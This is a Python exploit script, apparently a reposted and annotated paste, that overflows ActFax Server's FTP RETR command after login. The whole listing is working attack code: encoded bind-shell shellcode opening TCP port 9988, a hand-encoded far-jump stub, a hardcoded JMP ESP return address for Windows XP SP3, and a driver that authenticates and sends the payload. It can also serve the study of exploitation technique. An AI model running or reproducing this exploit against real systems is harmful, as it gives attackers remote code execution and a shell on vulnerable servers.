YeiZeta

FTPBRUTE_Python Modificado Español — note: despite the title, the listing below is a post-authentication FTP buffer-overflow exploit for ActFax Server, not an FTP brute-forcer.

Sep 5th, 2012
  1. #!/usr/bin/python
  2.  
  3. #-----------------------------------------------------------------------------------#
  4. # Exploit Title: ActFax Server FTP Remote BOF (post auth) #
  5. # Author: BreakSecurity #
  6. # Software Link: http://www.medianfire.es.tl (third-party mirror, not the vendor's site — treat any download from it as untrusted) #
  7. # Tested on: Windows XP PRO SP3 (version 2002) - VMware Workstation #
  8. #-----------------------------------------------------------------------------------#
  9. # Made for my mom. (original: ECHO POR MI MAMA) #
  10. # CiberSystem #
  11. #-----------------------------------------------------------------------------------#
  12.  
  13. import socket
  14. import sys
  15.  
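#-----------------------------------------------------------------------------------#
# payload => win32_bind LPORT=9988 Size=709 => Encoder=PexAlphaNum                  #
# Per the header: a bind shell on TCP/9988, alphanumeric-encoded. The leading        #
# \xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff looks like the encoder's call/pop        #
# get-PC stub and is the only non-alphanumeric part. Bytes literals keep the script  #
# working on both Python 2 (b"" is str) and Python 3.                               #
#-----------------------------------------------------------------------------------#
shellcode = (
    b"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
    b"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
    b"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
    b"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
    b"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e"
    b"\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x38"
    b"\x4e\x56\x46\x32\x46\x52\x4b\x48\x45\x34\x4e\x43\x4b\x38\x4e\x47"
    b"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x41\x4b\x48"
    b"\x4f\x55\x42\x32\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x33\x4b\x38"
    b"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"
    b"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
    b"\x46\x4f\x4b\x53\x46\x55\x46\x42\x4a\x42\x45\x47\x45\x4e\x4b\x48"
    b"\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x30\x4b\x44"
    b"\x4b\x58\x4f\x55\x4e\x51\x41\x30\x4b\x4e\x43\x30\x4e\x52\x4b\x38"
    b"\x49\x58\x4e\x56\x46\x42\x4e\x51\x41\x56\x43\x4c\x41\x33\x4b\x4d"
    b"\x46\x46\x4b\x48\x43\x34\x42\x43\x4b\x48\x42\x44\x4e\x50\x4b\x38"
    b"\x42\x47\x4e\x51\x4d\x4a\x4b\x38\x42\x54\x4a\x50\x50\x35\x4a\x56"
    b"\x50\x38\x50\x54\x50\x30\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x36"
    b"\x43\x35\x48\x36\x4a\x56\x43\x33\x44\x33\x4a\x46\x47\x47\x43\x47"
    b"\x44\x33\x4f\x55\x46\x45\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e"
    b"\x4e\x4f\x4b\x43\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x49\x58\x45\x4e"
    b"\x48\x56\x41\x48\x4d\x4e\x4a\x30\x44\x50\x45\x35\x4c\x46\x44\x50"
    b"\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55"
    b"\x4f\x4f\x48\x4d\x43\x45\x43\x55\x43\x55\x43\x45\x43\x55\x43\x44"
    b"\x43\x35\x43\x44\x43\x45\x4f\x4f\x42\x4d\x48\x36\x4a\x56\x47\x52"
    b"\x46\x30\x48\x36\x43\x55\x49\x38\x41\x4e\x45\x59\x4a\x36\x46\x4a"
    b"\x4c\x51\x42\x57\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x56\x42\x31"
    b"\x41\x45\x45\x45\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x32"
    b"\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x55\x45\x45\x4f\x4f\x42\x4d"
    b"\x4a\x56\x45\x4e\x49\x34\x48\x48\x49\x54\x47\x55\x4f\x4f\x48\x4d"
    b"\x42\x35\x46\x55\x46\x55\x45\x45\x4f\x4f\x42\x4d\x43\x39\x4a\x46"
    b"\x47\x4e\x49\x47\x48\x4c\x49\x57\x47\x45\x4f\x4f\x48\x4d\x45\x55"
    b"\x4f\x4f\x42\x4d\x48\x36\x4c\x56\x46\x46\x48\x36\x4a\x46\x43\x46"
    b"\x4d\x56\x49\x38\x45\x4e\x4c\x46\x42\x45\x49\x35\x49\x42\x4e\x4c"
    b"\x49\x58\x47\x4e\x4c\x46\x46\x44\x49\x38\x44\x4e\x41\x53\x42\x4c"
    b"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x44\x4e\x32"
    b"\x43\x59\x4d\x58\x4c\x57\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46"
    b"\x44\x47\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x37\x46\x44\x4f\x4f"
    b"\x48\x4d\x4b\x45\x47\x45\x44\x35\x41\x55\x41\x45\x41\x35\x4c\x56"
    b"\x41\x30\x41\x45\x41\x55\x45\x55\x41\x45\x4f\x4f\x42\x4d\x4a\x36"
    b"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x55\x4f\x4f\x48\x4d\x4c\x56"
    b"\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x38\x47\x35\x4e\x4f"
    b"\x43\x38\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d"
    b"\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x55\x43\x35\x4f\x4f\x48\x4d"
    b"\x4f\x4f\x42\x4d\x5a"
)

#-----------------------------------------------------------------------------------#
# ASCII encoded => Size=52 of printable AND/SUB/PUSH bytes, followed by a 2-byte     #
# JMP SHORT (0xEB 0xC1 is not printable), 54 bytes in total.                        #
# Decoded opcode => E9DE140000 - JMP 0178D7A7                                       #
# The two AND EAX pairs zero EAX; the SUB chains then build the far-jump dword       #
# which is PUSHed onto the stack at ESP.                                             #
#-----------------------------------------------------------------------------------#
farjump = (
    b"\x25\x4A\x4D\x4E\x55"  # AND EAX,554E4D4A
    b"\x25\x35\x32\x31\x2A"  # AND EAX,2A313235
    b"\x2D\x55\x55\x55\x5A"  # SUB EAX,5A555555
    b"\x2D\x55\x55\x55\x5A"  # SUB EAX,5A555555
    b"\x2D\x56\x55\x55\x5B"  # SUB EAX,5B555556
    b"\x50"                  # PUSH EAX
    b"\x25\x4A\x4D\x4E\x55"  # AND EAX,554E4D4A
    b"\x25\x35\x32\x31\x2A"  # AND EAX,2A313235
    b"\x2D\x5D\x60\x4E\x55"  # SUB EAX,554E605D
    b"\x2D\x5D\x60\x4E\x55"  # SUB EAX,554E605D
    b"\x2D\x5D\x60\x4E\x55"  # SUB EAX,554E605D
    b"\x50"                  # PUSH EAX
    b"\xEB\xC1"              # JMP SHORT 0112CAE0 (back to the beginning of ESP,
)                            # ESP now points to our decoded far-jump).

#-----------------------------------------------------------------------------------#
# (translated from the original Spanish note)                                       #
# At the time of the crash our buffer is copied several times in memory (some of    #
# the copies are corrupted), so we write a small "far jump" decoder at ESP. Once it #
# has decoded itself in memory we land in our NOP sled (I believe the 3rd copy of   #
# our buffer). Ironically this does not even crash the program; it only dies when   #
# the shell connection is closed...                                                 #
#                                                                                   #
# Jmp esp - user32.dll => 0x7E429353                                                #
# NOTE(review): a user32.dll address is only valid for the exact OS build it was    #
# taken from (header: Windows XP Pro SP3); it is the one OS-specific value here.    #
#-----------------------------------------------------------------------------------#
JMP_ESP = b"\x53\x93\x42\x7E"

# Default lab target and test account of the original listing; override via argv.
DEFAULT_HOST = "192.168.1.71"
DEFAULT_PORT = 21
DEFAULT_USER = "b33f"
DEFAULT_PASS = "b33f"


def build_payload():
    """Return the RETR argument that overflows the stack buffer.

    Layout (left to right):
      41 NOPs | shellcode (709) | 23 NOPs | saved-EIP overwrite (JMP ESP, 4)
      | 1 NOP | farjump (54) | 175 NOPs
    so the return address sits at offset 41 + 709 + 23 = 773.
    """
    nop = b"\x90"
    return (nop * 41 + shellcode + nop * 23 + JMP_ESP
            + nop * 1 + farjump + nop * 175)


def _recv(sock, size=1024):
    """Read one chunk of the server's reply; an empty read means the peer closed."""
    data = sock.recv(size)
    if not data:
        raise IOError("connection closed by server")
    return data


def main(argv=None):
    """Log in to the FTP server and send the overflowing RETR.

    Usage: actfax_bof.py [host] [port] [user] [password]
    Omitted arguments fall back to the original hard-coded lab values.
    The socket is always closed (the original called ``s.close`` without
    parentheses, which never closed it) and a connect/recv that hangs is
    bounded by a timeout instead of blocking forever.
    """
    argv = sys.argv[1:] if argv is None else argv
    host = argv[0] if len(argv) > 0 else DEFAULT_HOST
    port = int(argv[1]) if len(argv) > 1 else DEFAULT_PORT
    user = argv[2] if len(argv) > 2 else DEFAULT_USER
    password = argv[3] if len(argv) > 3 else DEFAULT_PASS

    print("\nActFax XP SP3 Pro...")
    print("Hunting for alphanumeric code!!\n")

    payload = build_payload()

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(10)
    try:
        sock.connect((host, port))
        _recv(sock)  # banner, discarded as in the original
        sock.sendall(b"USER " + user.encode("latin-1") + b"\r\n")
        print(_recv(sock).decode("latin-1", "replace"))
        sock.sendall(b"PASS " + password.encode("latin-1") + b"\r\n")
        login = _recv(sock)
        print(login.decode("latin-1", "replace"))
        # The bug is post-auth (see header); without a 230 the vulnerable RETR
        # handling is never reached, so don't fire the payload blindly.
        if not login.startswith(b"230"):
            sys.exit("Login failed (reply %r); not sending the payload." % login[:3])
        sock.sendall(b"RETR " + payload + b"\r\n")
    finally:
        sock.close()


if __name__ == "__main__":
    main()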